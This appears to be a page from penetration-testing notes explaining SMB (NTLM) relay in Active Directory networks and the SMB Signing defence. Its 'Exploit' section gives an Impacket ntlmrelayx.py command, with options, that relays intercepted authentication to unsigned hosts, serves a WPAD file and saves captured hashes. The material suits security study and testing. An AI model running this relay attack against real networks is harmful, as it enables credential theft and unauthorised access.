SMB Relay

Server Message Block (SMB) is a network protocol that is very popular within Active Directory environments that allow computers to communicate and share resources, such as file shares.

SMB relay, sometimes referred to as NTLM relay, is a technique that is commonly used in tandem with network poisoning attacks once the attacker is an Adversary-in-The-Middle (AiTM). As the AiTM, the attacker can intercept authentication traffic being sent over SMB and relay it to other computers on the network that do not have SMB Signing enabled.

SMB Signing is a security feature that digitally signs SMB packets exchanged between a client and a server. The client and server verify the sender and intended receiver of the SMB traffic, so authentication traffic sent over SMB cannot be sent to anyone other than the intended receiver. SMB Signing has been enabled by default for Windows Servers since Windows Server 2008 and will be enabled by default for Windows Computers beginning with Windows 11.

Exploit

GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.GitHub

Linux (Attacker)

ntlmrelayx.py -6 -wh [hostname].[domain] -tf [targets] -of creds/socks -socks -smb2support

OPTIONS
-6                           Listen On Both IPv4 AND IPv6
-wh [WPAD host]              Serve A WPAD File For Proxy Authentication Attack
-tf [targets]                Target Machines With SMB Signing Not Enabled To Relay Hashes To
-of [filename]               Output Filename For Intercepted Hashes
-socks                       Use A SOCKS Proxy For The Relayed Session (Port 1080)
-debug                       Enable Debug
-smb2support                 Enable SMBv2 Support

Impacket's ntlmrelayx.py can be used to relay SMB authentication traffic that is intercepted to computers on the network that have SMB Signing disabled. It supports authentication traffic obtained via both Responder and mitm6.

PreviousIPv6 NextKerberos

Last updated 1 year ago